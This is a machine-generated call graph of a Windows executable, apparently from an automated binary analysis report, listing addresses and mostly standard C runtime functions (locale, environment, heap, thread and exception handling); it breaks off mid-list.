9069->9070 9071 4d881b 9069->9071 9070->9033 9073 4ddb63 9071->9073 9074 4ddca9 ___vcrt_FlsGetValue 5 API calls 9073->9074 9075 4ddb7d 9074->9075 9076 4ddb95 TlsFree 9075->9076 9077 4ddb89 9075->9077 9076->9077 9077->9070 9079 4db115 9078->9079 9080 4d50b6 9078->9080 9079->9080 9082 4da732 9079->9082 9080->8967 9080->9018 9083 4da739 9082->9083 9084 4da77c GetStdHandle 9083->9084 9085 4da7de 9083->9085 9086 4da78f GetFileType 9083->9086 9084->9083 9085->9079 9086->9083 9088 4d7b88 9087->9088 9092 4d7b9e 9087->9092 9088->9092 9093 4d7ac0 9088->9093 9090 4d7b95 9090->9092 9110 4d7c8d 9090->9110 9092->8972 9094 4d7acc 9093->9094 9095 4d7ac9 9093->9095 9119 4da880 9094->9119 9095->9090 9100 4d7add 9102 4db0cb ___free_lconv_mon 14 API calls 9100->9102 9101 4d7ae9 9146 4d7bab 9101->9146 9104 4d7ae3 9102->9104 9104->9090 9106 4db0cb ___free_lconv_mon 14 API calls 9107 4d7b0d 9106->9107 9108 4db0cb ___free_lconv_mon 14 API calls 9107->9108 9109 4d7b13 9108->9109 9109->9090 9111 4d7cfe 9110->9111 9116 4d7c9c 9110->9116 9111->9092 9112 4dd131 WideCharToMultiByte ___scrt_uninitialize_crt 9112->9116 9113 4db807 _unexpected 14 API calls 9113->9116 9114 4d7d02 9115 4db0cb ___free_lconv_mon 14 API calls 9114->9115 9115->9111 9116->9111 9116->9112 9116->9113 9116->9114 9118 4db0cb ___free_lconv_mon 14 API calls 9116->9118 9554 4dd304 9116->9554 9118->9116 9120 4da889 9119->9120 9121 4d7ad2 9119->9121 9168 4da0c5 9120->9168 9125 4dd22d GetEnvironmentStringsW 9121->9125 9126 4dd245 9125->9126 9131 4d7ad7 9125->9131 9127 4dd131 ___scrt_uninitialize_crt WideCharToMultiByte 9126->9127 9128 4dd262 9127->9128 9129 4dd26c FreeEnvironmentStringsW 9128->9129 9130 4dd277 9128->9130 9129->9131 9132 4dbc45 __strnicoll 15 API calls 9130->9132 9131->9100 9131->9101 9133 4dd27e 9132->9133 9134 4dd297 9133->9134 9135 4dd286 9133->9135 9137 4dd131 ___scrt_uninitialize_crt WideCharToMultiByte 9134->9137 9136 4db0cb ___free_lconv_mon 14 API calls 9135->9136 9138 4dd28b FreeEnvironmentStringsW 9136->9138 9139 4dd2a7 9137->9139 9138->9131 9140 4dd2ae 9139->9140 9141 4dd2b6 9139->9141 9142 4db0cb ___free_lconv_mon 14 API calls 9140->9142 9143 4db0cb ___free_lconv_mon 14 API calls 9141->9143 9144 4dd2b4 FreeEnvironmentStringsW 9142->9144 9143->9144 9144->9131 9147 4d7bc0 9146->9147 9148 4db807 _unexpected 14 API calls 9147->9148 9149 4d7be7 9148->9149 9150 4d7bef 9149->9150 9151 4d7bf9 9149->9151 9152 4db0cb ___free_lconv_mon 14 API calls 9150->9152 9154 4d7c56 9151->9154 9156 4db807 _unexpected 14 API calls 9151->9156 9157 4d7c65 9151->9157 9162 4d7c80 9151->9162 9164 4db0cb ___free_lconv_mon 14 API calls 9151->9164 9535 4d96ac 9151->9535 9153 4d7af0 9152->9153 9153->9106 9155 4db0cb ___free_lconv_mon 14 API calls 9154->9155 9155->9153 9156->9151 9544 4d7b50 9157->9544 9161 4db0cb ___free_lconv_mon 14 API calls 9163 4d7c72 9161->9163 9550 4d7d96 IsProcessorFeaturePresent 9162->9550 9167 4db0cb ___free_lconv_mon 14 API calls 9163->9167 9164->9151 9166 4d7c8c 9167->9153 9169 4da0d6 9168->9169 9170 4da0d0 9168->9170 9171 4d9bcf _unexpected 6 API calls 9169->9171 9190 4da0dc 9169->9190 9172 4d9b90 _unexpected 6 API calls 9170->9172 9173 4da0f0 9171->9173 9172->9169 9174 4db807 _unexpected 14 API calls 9173->9174 9173->9190 9176 4da100 9174->9176 9178 4da11d 9176->9178 9179 4da108 9176->9179 9180 4d9bcf _unexpected 6 API calls 9178->9180 9181 4d9bcf _unexpected 6 API calls 9179->9181 9182 4da129 9180->9182 9183 4da114 9181->9183 9184 4da12d 9182->9184 9185 4da13c 9182->9185 9188 4db0cb ___free_lconv_mon 14 API calls 9183->9188 9186 4d9bcf _unexpected 6 API calls 9184->9186 9187 4da31c _unexpected 14 API calls 9185->9187 9186->9183 9189 4da147 9187->9189 9188->9190 9191 4db0cb ___free_lconv_mon 14 API calls 9189->9191 9192 4da0e1 9190->9192 9215 4d835d 9190->9215 9191->9192 9193 4dacc3 9192->9193 9194 4daced 9193->9194 9359 4dab4f 9194->9359 9199 4dad2d 9373 4da94a 9199->9373 9200 4dad1f 9201 4db0cb ___free_lconv_mon 14 API calls 9200->9201 9204 4dad06 9201->9204 9204->9121 9205 4dad65 9206 4db757 __dosmaperr 14 API calls 9205->9206 9208 4dad6a 9206->9208 9207 4dadac 9211 4dadf5 9207->9211 9384 4db07e 9207->9384 9209 4db0cb ___free_lconv_mon 14 API calls 9208->9209 9209->9204 9210 4dad80 9210->9207 9213 4db0cb ___free_lconv_mon 14 API calls 9210->9213 9212 4db0cb ___free_lconv_mon 14 API calls 9211->9212 9212->9204 9213->9207 9224 4db1bc 9215->9224 9217 4d8362 9217->9215 9219 4d8377 IsProcessorFeaturePresent 9217->9219 9220 4d6eeb __FrameHandler3::FrameUnwindToState 21 API calls 9217->9220 9223 4d8839 9217->9223 9227 4db1e3 9217->9227 9254 4d7dca 9217->9254 9260 4d883a 9217->9260 9219->9217 9220->9217 9274 4db43f 9224->9274 9228 4db1ef ___scrt_is_nonwritable_in_current_image 9227->9228 9229 4da15b __dosmaperr 14 API calls 9228->9229 9230 4db23f 9228->9230 9232 4db251 __FrameHandler3::FrameUnwindToState 9228->9232 9236 4db220 __FrameHandler3::FrameUnwindToState 9228->9236 9229->9236 9231 4db757 __dosmaperr 14 API calls 9230->9231 9234 4db244 9231->9234 9233 4db287 __FrameHandler3::FrameUnwindToState 9232->9233 9288 4d8161 EnterCriticalSection 9232->9288 9239 4db2c4 9233->9239 9240 4db3c1 9233->9240 9250 4db2f2 9233->9250 9285 4d7d69 9234->9285 9236->9230 9236->9232 9253 4db229 9236->9253 9239->9250 9289 4da00a GetLastError 9239->9289 9241 4db3cc 9240->9241 9320 4d8178 LeaveCriticalSection 9240->9320 9244 4d6eeb __FrameHandler3::FrameUnwindToState 21 API calls 9241->9244 9245 4db3d4 9244->9245 9247 4da00a _unexpected 48 API calls 9251 4db347 9247->9251 9249 4da00a _unexpected 48 API calls 9249->9250 9316 4db36d 9250->9316 9252 4da00a _unexpected 48 API calls 9251->9252 9251->9253 9252->9253 9253->9217 9255 4d7de6 __FrameHandler3::FrameUnwindToState std::bad_exception::bad_exception 9254->9255 9256 4d7e12 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9255->9256 9257 4d7ee3 __FrameHandler3::FrameUnwindToState 9256->9257 9343 4d4241 9257->9343 9259 4d7f01 9259->9217 9261 4d8846 GetLastError 9260->9261 9262 4d8843 9260->9262 9351 4ddb9e 9261->9351 9262->9217 9264 4d88c0 SetLastError 9264->9217 9266 4ddbd9 ___vcrt_FlsSetValue 6 API calls 9267 4d8874 _unexpected 9266->9267 9268 4d889c 9267->9268 9269 4ddbd9 ___vcrt_FlsSetValue 6 API calls 9267->9269 9273 4d887a 9267->9273 9270 4ddbd9 ___vcrt_FlsSetValue 6 API calls 9268->9270 9271 4d88b0 9268->9271 9269->9268 9270->9271 9356 4d83ac 9271->9356 9273->9264 9275 4db44b ___scrt_is_nonwritable_in_current_image 9274->9275 9280 4d8161 EnterCriticalSection 9275->9280 9277 4db459 9281 4db49b 9277->9281 9280->9277 9284 4d8178 LeaveCriticalSection 9281->9284 9283 4db1e1 9283->9217 9284->9283 9321 4d809f 9285->9321 9288->9233 9290 4da026 9289->9290 9291 4da020 9289->9291 9293 4d9bcf _unexpected 6 API calls 9290->9293 9295 4da02a SetLastError 9290->9295 9292 4d9b90 _unexpected 6 API calls 9291->9292 9292->9290 9294 4da042 9293->9294 9294->9295 9297 4db807 _unexpected 14 API calls 9294->9297 9298 4da0bf 9295->9298 9299 4da0ba 9295->9299 9300 4da057 9297->9300 9303 4d835d __FrameHandler3::FrameUnwindToState 46 API calls 9298->9303 9299->9249 9301 4da05f 9300->9301 9302 4da070 9300->9302 9304 4d9bcf _unexpected 6 API calls 9301->9304 9305 4d9bcf _unexpected 6 API calls 9302->9305 9306 4da0c4 9303->9306 9307 4da06d 9304->9307 9308 4da07c 9305->9308 9312 4db0cb ___free_lconv_mon 14 API calls 9307->9312 9309 4da097 9308->9309 9310 4da080 9308->9310 9313 4da31c _unexpected 14 API calls 9309->9313 9311 4d9bcf _unexpected 6 API calls 9310->9311 9311->9307 9312->9295 9314 4da0a2 9313->9314 9315 4db0cb ___free_lconv_mon 14 API calls 9314->9315 9315->9295 9317 4db339 9316->9317 9318 4db371 9316->9318 9317->9247 9317->9251 9317->9253 9342 4d8178 LeaveCriticalSection 9318->9342 9320->9241 9322 4d80b1 __strnicoll 9321->9322 9327 4d7f12 9322->9327 9328 4d7f22 9327->9328 9330 4d7f29 9327->9330 9329 4d8030 __strnicoll 16 API calls 9328->9329 9329->9330 9331 4d8076 __strnicoll GetLastError SetLastError 9330->9331 9335 4d7f37 9330->9335 9332 4d7f5e 9331->9332 9333 4d7d96 __strnicoll 11 API calls 9332->9333 9332->9335 9334 4d7f8e 9333->9334 9336 4d7fd7 9335->9336 9337 4d7fe3 9336->9337 9338 4d7ffa 9337->9338 9340 4d8013 __strnicoll 48 API calls 9337->9340 9339 4d7d75 9338->9339 9341 4d8013 __strnicoll 48 API calls 9338->9341 9339->9253 9340->9338 9341->9339 9342->9317 9344 4d4249 9343->9344 9345 4d424a IsProcessorFeaturePresent 9343->9345 9344->9259 9347 4d49f4 9345->9347 9350 4d4ad9 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9347->9350 9349 4d4ad7 9349->9259 9350->9349 9352 4ddca9 ___vcrt_FlsGetValue 5 API calls 9351->9352 9353 4ddbb8 9352->9353 9354 4ddbd0 TlsGetValue 9353->9354 9355 4d885b 9353->9355 9354->9355 9355->9264 9355->9266 9355->9273 9357 4db0cb ___free_lconv_mon 14 API calls 9356->9357 9358 4d83c4 9357->9358 9358->9273 9392 4da8c8 9359->9392 9362 4dab70 GetOEMCP 9364 4dab99 9362->9364 9363 4dab82 9363->9364 9365 4dab87 GetACP 9363->9365 9364->9204 9366 4dbc45 9364->9366 9365->9364 9367 4dbc83 9366->9367 9372 4dbc53 _unexpected 9366->9372 9368 4db757 __dosmaperr 14 API calls 9367->9368 9370 4dad17 9368->9370 9369 4dbc6e RtlAllocateHeap 9369->9370 9369->9372 9370->9199 9370->9200 9371 4d7207 _unexpected 2 API calls 9371->9372 9372->9367 9372->9369 9372->9371 9374 4dab4f 50 API calls 9373->9374 9375 4da96a 9374->9375 9376 4da9a7 IsValidCodePage 9375->9376 9382 4daa6f 9375->9382 9383 4da9c2 std::bad_exception::bad_exception 9375->9383 9378 4da9b9 9376->9378 9376->9382 9377 4d4241 TranslatorGuardHandler 5 API calls 9379 4dab4d 9377->9379 9380 4da9e2 GetCPInfo 9378->9380 9378->9383 9379->9205 9379->9210 9380->9382 9380->9383 9382->9377 9432 4daed9 9383->9432 9385 4db08a ___scrt_is_nonwritable_in_current_image 9384->9385 9509 4d8161 EnterCriticalSection 9385->9509 9387 4db094 9510 4dae18 9387->9510 9393 4da8e6 9392->9393 9394 4da8df 9392->9394 9393->9394 9395 4da00a _unexpected 48 API calls 9393->9395 9394->9362 9394->9363 9396 4da907 9395->9396 9400 4dd95d 9396->9400 9401 4dd970 9400->9401 9403 4da91d 9400->9403 9401->9403 9408 4dc179 9401->9408 9404 4dd98a 9403->9404 9405 4dd99d 9404->9405 9406 4dd9b2 9404->9406 9405->9406 9429 4da863 9405->9429 9406->9394 9409 4dc185 ___scrt_is_nonwritable_in_current_image 9408->9409 9410 4da00a _unexpected 48 API calls 9409->9410 9411 4dc18e 9410->9411 9418 4dc1d4 9411->9418 9421 4d8161 EnterCriticalSection 9411->9421 9413 4dc1ac 9422 4dc1fa 9413->9422 9418->9403 9419 4d835d __FrameHandler3::FrameUnwindToState 48 API calls 9420 4dc1f9 9419->9420 9421->9413 9423 4dc1bd 9422->9423 9424 4dc208 __strnicoll 9422->9424 9426 4dc1d9 9423->9426 9424->9423 9425 4dbfae __strnicoll 14 API calls 9424->9425 9425->9423 9427 4d8178 __FrameHandler3::FrameUnwindToState LeaveCriticalSection 9426->9427 9428 4dc1d0 9427->9428 9428->9418 9428->9419 9430 4da00a _unexpected 48 API calls 9429->9430 9431 4da868 9430->9431 9431->9406 9433 4daf01 GetCPInfo 9432->9433 9434 4dafca 9432->9434 9433->9434 9439 4daf19 9433->9439 9436 4d4241 TranslatorGuardHandler 5 API calls 9434->9436 9437 4db07c 9436->9437 9437->9382 9443 4dbced 9439->9443 9442 4dded4 52 API calls 9442->9434 9444 4da8c8 __strnicoll 48 API calls 9443->9444 9445 4dbd0d 9444->9445 9463 4dbdee 9445->9463 9447 4dbdc9 9450 4d4241 TranslatorGuardHandler 5 API calls 9447->9450 9448 4dbdc1 9466 4dbccd 9448->9466 9449 4dbd3a 9449->9447 9449->9448 9452 4dbc45 __strnicoll 15 API calls 9449->9452 9454 4dbd5f __alloca_probe_16 std::bad_exception::bad_exception 9449->9454 9453 4daf81 9450->9453 9452->9454 9458 4dded4 9453->9458 9454->9448 9455 4dbdee __strnicoll MultiByteToWideChar 9454->9455 9456 4dbda8 9455->9456 9456->9448 9457 4dbdaf GetStringTypeW 9456->9457 9457->9448 9459 4da8c8 __strnicoll 48 API calls 9458->9459 9460 4ddee7 9459->9460 9472 4ddf1d 9460->9472 9470 4dbe18 9463->9470 9467 4dbcd9 9466->9467 9468 4dbcea 9466->9468 9467->9468 9469 4db0cb ___free_lconv_mon 14 API calls 9467->9469 9468->9447 9469->9468 9471 4dbe0a MultiByteToWideChar 9470->9471 9471->9449 9473 4ddf38 __strnicoll 9472->9473 9474 4dbdee __strnicoll MultiByteToWideChar 9473->9474 9478 4ddf7c 9474->9478 9475 4de0f7 9476 4d4241 TranslatorGuardHandler 5 API calls 9475->9476 9477 4dafa2 9476->9477 9477->9442 9478->9475 9479 4dbc45 __strnicoll 15 API calls 9478->9479 9481 4ddfa2 __alloca_probe_16 9478->9481 9492 4de04a 9478->9492 9479->9481 9480 4dbccd __freea 14 API calls 9480->9475 9482 4dbdee __strnicoll MultiByteToWideChar 9481->9482 9481->9492 9483 4ddfeb 9482->9483 9483->9492 9500 4d9c5c 9483->9500 9486 4de059 9488 4de0e2 9486->9488 9490 4dbc45 __strnicoll 15 API calls 9486->9490 9493 4de06b __alloca_probe_16 9486->9493 9487 4de021 9489 4d9c5c 6 API calls 9487->9489 9487->9492 9491 4dbccd __freea 14 API calls 9488->9491 9489->9492 9490->9493 9491->9492 9492->9480 9493->9488 9494 4d9c5c 6 API calls 9493->9494 9495 4de0ae 9494->9495 9495->9488 9506 4dd131 9495->9506 9497 4de0c8 9497->9488 9498 4de0d1 9497->9498 9499 4dbccd __freea 14 API calls 9498->9499 9499->9492 9501 4d9f57 LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary GetProcAddress 9500->9501 9502 4d9c67 9501->9502 9503 4d9cb9 __strnicoll 5 API calls 9502->9503 9505 4d9c6d 9502->9505 9504 4d9cad LCMapStringW 9503->9504 9504->9505 9505->9486 9505->9487 9505->9492 9508 4dd144 ___scrt_uninitialize_crt 9506->9508 9507 4dd182 WideCharToMultiByte 9507->9497 9508->9507 9509->9387 9520 4da7e2 9510->9520 9512 4dae3a 9513 4da7e2 48 API calls 9512->9513 9514 4dae59 9513->9514 9515 4dae80 9514->9515 9516 4db0cb ___free_lconv_mon 14 API calls 9514->9516 9517 4db0bf 9515->9517 9516->9515 9534 4d8178 LeaveCriticalSection 9517->9534 9519 4db0ad 9519->9211 9521 4da7f3 9520->9521 9530 4da7ef CatchIt 9520->9530 9522 4da7fa 9521->9522 9526 4da80d std::bad_exception::bad_exception 9521->9526 9523 4db757 __dosmaperr 14 API calls 9522->9523 9524 4da7ff 9523->9524 9525 4d7d69 __strnicoll 48 API calls 9524->9525 9525->9530 9527 4da83b 9526->9527 9528 4da844 9526->9528 9526->9530 9529 4db757 __dosmaperr 14 API calls 9527->9529 9528->9530 9532 4db757 __dosmaperr 14 API calls 9528->9532 9531 4da840 9529->9531 9530->9512 9533 4d7d69 __strnicoll 48 API calls 9531->9533 9532->9531 9533->9530 9534->9519 9536 4d96c8 9535->9536 9537 4d96ba 9535->9537 9538 4db757 __dosmaperr 14 API calls 9536->9538 9537->9536 9540 4d96e0 9537->9540 9543 4d96d0 9538->9543 9539 4d7d69 __strnicoll 48 API calls 9541 4d96da 9539->9541 9540->9541 9542 4db757 __dosmaperr 14 API calls 9540->9542 9541->9151 9542->9543 9543->9539 9548 4d7b5d 9544->9548 9549 4d7b7a 9544->9549 9545 4d7b74 9547 4db0cb ___free_lconv_mon 14 API calls 9545->9547 9546 4db0cb ___free_lconv_mon 14 API calls 9546->9548 9547->9549 9548->9545 9548->9546 9549->9161 9551 4d7da2 9550->9551 9552 4d7dca __FrameHandler3::FrameUnwindToState 8 API calls 9551->9552 9553 4d7db7 GetCurrentProcess TerminateProcess 9552->9553 9553->9166 9555 4dd30f 9554->9555 9556 4dd320 9555->9556 9559 4dd333 ___from_strstr_to_strchr 9555->9559 9557 4db757 __dosmaperr 14 API calls 9556->9557 9558 4dd325 9557->9558 9558->9116 9560 4dd54a 9559->9560 9562 4dd353 9559->9562 9561 4db757 __dosmaperr 14 API calls 9560->9561 9563 4dd54f 9561->9563 9617 4dd56f 9562->9617 9565 4db0cb ___free_lconv_mon 14 API calls 9563->9565 9565->9558 9567 4dd399 9571 4db807 _unexpected 14 API calls 9567->9571 9583 4dd383 9567->9583 9568 4dd375 9575 4dd37e 9568->9575 9576 4dd392 9568->9576 9572 4dd3a7 9571->9572 9574 4db0cb ___free_lconv_mon 14 API calls 9572->9574 9573 4db0cb ___free_lconv_mon 14 API calls 9573->9558 9578 4dd3b2 9574->9578 9579 4db757 __dosmaperr 14 API calls 9575->9579 9580 4dd56f 48 API calls 9576->9580 9577 4dd40c 9582 4db0cb ___free_lconv_mon 14 API calls 9577->9582 9578->9583 9584 4dd397 9578->9584 9587 4db807 _unexpected 14 API calls 9578->9587 9579->9583 9580->9584 9581 4dd457 9581->9583 9585 4dd0c4 51 API calls 9581->9585 9589 4dd414 9582->9589 9583->9573 9584->9583 9621 4dd589 9584->9621 9586 4dd485 9585->9586 9588 4db0cb ___free_lconv_mon 14 API calls 9586->9588 9590 4dd3ce 9587->9590 9595 4dd441 9588->9595 9589->9595 9625 4dd0c4 9589->9625 9594 4db0cb ___free_lconv_mon 14 API calls 9590->9594 9591 4dd53f 9592 4db0cb ___free_lconv_mon 14 API calls 9591->9592 9592->9558 9594->9584 9595->9583 9595->9591 9595->9595 9598 4db807 _unexpected 14 API calls 9595->9598 9596 4dd438 9597 4db0cb ___free_lconv_mon 14 API calls 9596->9597 9597->9595 9599 4dd4d0 9598->9599 9600 4dd4d8 9599->9600 9601 4dd4e0 9599->9601 9602 4db0cb ___free_lconv_mon 14 API calls 9600->9602 9603 4d96ac ___std_exception_copy 48 API calls 9601->9603 9602->9583 9604 4dd4ec 9603->9604 9605 4dd564 9604->9605 9606 4dd4f3 9604->9606 9608 4d7d96 __strnicoll 11 API calls 9605->9608 9634 4df9bc 9606->9634 9610 4dd56e 9608->9610 9611 4dd539 9614 4db0cb ___free_lconv_mon 14 API calls 9611->9614 9612 4dd51a 9613 4db757 __dosmaperr 14 API calls 9612->9613 9615 4dd51f 9613->9615 9614->9591 9616 4db0cb ___free_lconv_mon 14 API calls 9615->9616 9616->9583 9618 4dd57c 9617->9618 9619 4dd35e 9617->9619 9649 4dd5de 9618->9649 9619->9567 9619->9568 9619->9584 9622 4dd3fc 9621->9622 9624 4dd59f 9621->9624 9622->9577 9622->9581 9624->9622 9664 4df8cb 9624->9664 9626 4dd0ec 9625->9626 9627 4dd0d1 9625->9627 9629 4dd0fb 9626->9629 9764 4df6f8 9626->9764 9627->9626 9628 4dd0dd 9627->9628 9630 4db757 __dosmaperr 14 API calls 9628->9630 9771 4df72b 9629->9771 9633 4dd0e2 std::bad_exception::bad_exception 9630->9633 9633->9596 9783 4dc274 9634->9783 9639 4dfa2f 9640 4dfa3b 9639->9640 9642 4db0cb ___free_lconv_mon 14 API calls 9639->9642 9644 4db0cb ___free_lconv_mon 14 API calls 9640->9644 9646 4dd514 9640->9646 9641 4dc274 48 API calls 9643 4dfa0c 9641->9643 9642->9640 9645 4dc30c 17 API calls 9643->9645 9644->9646 9647 4dfa19 9645->9647 9646->9611 9646->9612 9647->9639 9648 4dfa23 SetEnvironmentVariableW 9647->9648 9648->9639 9650 4dd5f1 9649->9650 9656 4dd5ec 9649->9656 9651 4db807 _unexpected 14 API calls 9650->9651 9661 4dd60e 9651->9661 9652 4dd67c 9653 4d835d __FrameHandler3::FrameUnwindToState 48 API calls 9652->9653 9655 4dd681 9653->9655 9654 4db0cb ___free_lconv_mon 14 API calls 9654->9656 9657 4d7d96 __strnicoll 11 API calls 9655->9657 9656->9619 9658 4dd68d 9657->9658 9659 4db807 _unexpected 14 API calls 9659->9661 9660 4db0cb ___free_lconv_mon 14 API calls 9660->9661 9661->9652 9661->9655 9661->9659 9661->9660 9662 4d96ac ___std_exception_copy 48 API calls 9661->9662 9663 4dd66b 9661->9663 9662->9661 9663->9654 9665 4df8df 9664->9665 9666 4df8d9 9664->9666 9682 4df8f4 9665->9682 9668 4e0199 9666->9668 9669 4e01e1 9666->9669 9672 4e019f 9668->9672 9675 4e01bc 9668->9675 9702 4e01f7 9669->9702 9674 4db757 __dosmaperr 14 API calls 9672->9674 9673 4e01af 9673->9624 9676 4e01a4 9674->9676 9678 4db757 __dosmaperr 14 API calls 9675->9678 9681 4e01da 9675->9681 9677 4d7d69 __strnicoll 48 API calls 9676->9677 9677->9673 9679 4e01cb 9678->9679 9680 4d7d69 __strnicoll 48 API calls 9679->9680 9680->9673 9681->9624 9683 4da8c8 __strnicoll 48 API calls 9682->9683 9684 4df90a 9683->9684 9685 4df926 9684->9685 9686 4df93d 9684->9686 9701 4df8ef 9684->9701 9687 4db757 __dosmaperr 14 API calls 9685->9687 9688 4df958 9686->9688 9689 4df946 9686->9689 9690 4df92b 9687->9690 9692 4df978 9688->9692 9693 4df965 9688->9693 9691 4db757 __dosmaperr 14 API calls 9689->9691 9694 4d7d69 __strnicoll 48 API calls 9690->9694 9695 4df94b 9691->9695 9720 4e02c2 9692->9720 9696 4e01f7 __strnicoll 48 API calls 9693->9696 9694->9701 9698 4d7d69 __strnicoll 48 API calls 9695->9698 9696->9701 9698->9701 9700 4db757 __dosmaperr 14 API calls 9700->9701 9701->9624 9703 4e0207 9702->9703 9704 4e0221 9702->9704 9707 4db757 __dosmaperr 14 API calls 9703->9707 9705 4e0229 9704->9705 9706 4e0240 9704->9706 9709 4db757 __dosmaperr 14 API calls 9705->9709 9710 4e024c 9706->9710 9711 4e0263 9706->9711 9708 4e020c 9707->9708 9712 4d7d69 __strnicoll 48 API calls 9708->9712 9713 4e022e 9709->9713 9714 4db757 __dosmaperr 14 API calls 9710->9714 9715 4da8c8 __strnicoll 48 API calls 9711->9715 9718 4e0217 9711->9718 9712->9718 9716 4d7d69 __strnicoll 48 API calls 9713->9716 9717 4e0251 9714->9717 9715->9718 9716->9718 9719 4d7d69 __strnicoll 48 API calls 9717->9719 9718->9673 9719->9718 9721 4da8c8 __strnicoll 48 API calls 9720->9721 9722 4e02d5 9721->9722 9725 4e0308 9722->9725 9726 4e033c __strnicoll 9725->9726 9729 4e03bc 9726->9729 9730 4e05a0 9726->9730 9732 4e03a9 GetCPInfo 9726->9732 9737 4e03c0 9726->9737 9727 4d4241 TranslatorGuardHandler 5 API calls 9728 4df98e 9727->9728 9728->9700 9728->9701 9731 4dbdee __strnicoll MultiByteToWideChar 9729->9731 9729->9737 9734 4e0442 9731->9734 9732->9729 9732->9737 9733 4e0594 9736 4dbccd __freea 14 API calls 9733->9736 9734->9733 9735 4dbc45 __strnicoll 15 API calls 9734->9735 9734->9737 9738 4e0469 __alloca_probe_16 9734->9738 9735->9738 9736->9737 9737->9727 9737->9730 9738->9733 9739 4dbdee __strnicoll MultiByteToWideChar 9738->9739 9740 4e04b5 9739->9740 9740->9733 9741 4dbdee __strnicoll MultiByteToWideChar 9740->9741 9742 4e04d1 9741->9742 9742->9733 9743 4e04df 9742->9743 9744 4e0542 9743->9744 9745 4dbc45 __strnicoll 15 API calls 9743->9745 9748 4e04f8 __alloca_probe_16 9743->9748 9746 4dbccd __freea 14 API calls 9744->9746 9745->9748 9747 4e0548 9746->9747 9749 4dbccd __freea 14 API calls 9747->9749 9748->9744 9750 4dbdee __strnicoll MultiByteToWideChar 9748->9750 9749->9737 9751 4e053b 9750->9751 9751->9744 9752 4e0564 9751->9752 9758 4d9ab5 9752->9758 9755 4dbccd __freea 14 API calls 9756 4e0584 9755->9756 9757 4dbccd __freea 14 API calls 9756->9757 9757->9737 9759 4d9f3d __strnicoll 5 API calls 9758->9759 9760 4d9ac0 9759->9760 9761 4d9cb9 __strnicoll 5 API calls 9760->9761 9763 4d9ac6 9760->9763 9762 4d9b06 CompareStringW 9761->9762 9762->9763 9763->9755 9765 4df718 HeapSize 9764->9765 9766 4df703 9764->9766 9765->9629 9767 4db757 __dosmaperr 14 API calls 9766->9767 9768 4df708 9767->9768 9769 4d7d69 __strnicoll 48 API calls 9768->9769 9770 4df713 9769->9770 9770->9629 9772 4df738 9771->9772 9773 4df743 9771->9773 9775 4dbc45 __strnicoll 15 API calls 9772->9775 9774 4df74b 9773->9774 9781 4df754 _unexpected 9773->9781 9776 4db0cb ___free_lconv_mon 14 API calls 9774->9776 9779 4df740 9775->9779 9776->9779 9777 4df77e HeapReAlloc 9777->9779 9777->9781 9778 4df759 9780 4db757 __dosmaperr 14 API calls 9778->9780 9779->9633 9780->9779 9781->9777 9781->9778 9782 4d7207 _unexpected 2 API calls 9781->9782 9782->9781 9784 4da8c8 __strnicoll 48 API calls 9783->9784 9785 4dc286 9784->9785 9786 4dc298 9785->9786 9791 4d9a96 9785->9791 9788 4dc30c 9786->9788 9797 4dc4e2 9788->9797 9794 4d9f23 9791->9794 9795 4d9e9e _unexpected 5 API calls 9794->9795 9796 4d9a9e 9795->9796 9796->9786 9798 4dc50a 9797->9798 9799 4dc4f0 9797->9799 9801 4dc511 9798->9801 9802 4dc530 9798->9802 9815 4dc2f2 9799->9815 9806 4dc324 9801->9806 9819 4dc2b3 9801->9819 9803 4dbdee __strnicoll MultiByteToWideChar 9802->9803 9805 4dc53f 9803->9805 9807 4dc546 GetLastError 9805->9807 9809 4dc56c 9805->9809 9811 4dc2b3 15 API calls 9805->9811 9806->9639 9806->9641 9824 4db77d 9807->9824 9809->9806 9812 4dbdee __strnicoll MultiByteToWideChar 9809->9812 9811->9809 9814 4dc583 9812->9814 9813 4db757 __dosmaperr 14 API calls 9813->9806 9814->9806 9814->9807 9816 4dc2fd 9815->9816 9817 4dc305 9815->9817 9818 4db0cb ___free_lconv_mon 14 API calls 9816->9818 9817->9806 9818->9817 9820 4dc2f2 14 API calls 9819->9820 9821 4dc2c1 9820->9821 9829 4dc255 9821->9829 9832 4db76a 9824->9832 9826 4db788 __dosmaperr 9827 4db757 __dosmaperr 14 API calls 9826->9827 9828 4db79b 9827->9828 9828->9813 9830 4dbc45 __strnicoll 15 API calls 9829->9830 9831 4dc262 9830->9831 9831->9806 9833 4da15b __dosmaperr 14 API calls 9832->9833 9834 4db76f 9833->9834 9834->9826 9836 4cce50 std::_Throw_Cpp_error 9835->9836 9854 4d3b60 9836->9854 9839 4cce70 9844 4cce93 9839->9844 9840 4cd449 9841 4d4241 TranslatorGuardHandler 5 API calls 9840->9841 9842 4ccdd5 CreateEllipticRgn 9841->9842 9848 4cd4a0 9842->9848 9843 4ccf87 GetCurrentThreadId 9843->9844 9844->9840 9844->9843 9845 4d441d std::_Throw_Cpp_error 52 API calls 9844->9845 9847 4d441d 52 API calls std::_Throw_Cpp_error 9844->9847 10211 4d4952 WaitForSingleObjectEx 9844->10211 9845->9843 9847->9844 9849 4cd4c0 9848->9849 9851 4cd528 9849->9851 10216 4d846b 9849->10216 9852 4d4241 TranslatorGuardHandler 5 API calls 9851->9852 9853 4cce14 9852->9853 9853->8981 9855 4d3b8b std::_Throw_Cpp_error 9854->9855 9868 4d3cc0 9855->9868 9857 4d3b9a 9877 4d6ce6 9857->9877 9859 4d3bea 9860 4d3c84 9859->9860 9862 4d3c9a 9859->9862 9892 4d3de0 9859->9892 9896 4d441d 9860->9896 9902 4d3e30 9862->9902 9866 4d4241 TranslatorGuardHandler 5 API calls 9867 4ccdc7 9866->9867 9867->9839 9908 4d41c6 9868->9908 9870 4d3cef std::_Throw_Cpp_error 9922 4d3f00 9870->9922 9875 4d4241 TranslatorGuardHandler 5 API calls 9876 4d3d32 9875->9876 9876->9857 9878 4d6d07 9877->9878 9879 4d6cf3 9877->9879 9946 4d6d77 9878->9946 9880 4db757 __dosmaperr 14 API calls 9879->9880 9883 4d6cf8 9880->9883 9885 4d7d69 __strnicoll 48 API calls 9883->9885 9884 4d6d1c CreateThread 9886 4d6d3b GetLastError 9884->9886 9890 4d6d47 9884->9890 9963 4d6e00 9884->9963 9887 4d6d03 9885->9887 9888 4db77d __dosmaperr 14 API calls 9886->9888 9887->9859 9888->9890 9955 4d6dc7 9890->9955 9893 4d3e0c 9892->9893 9894 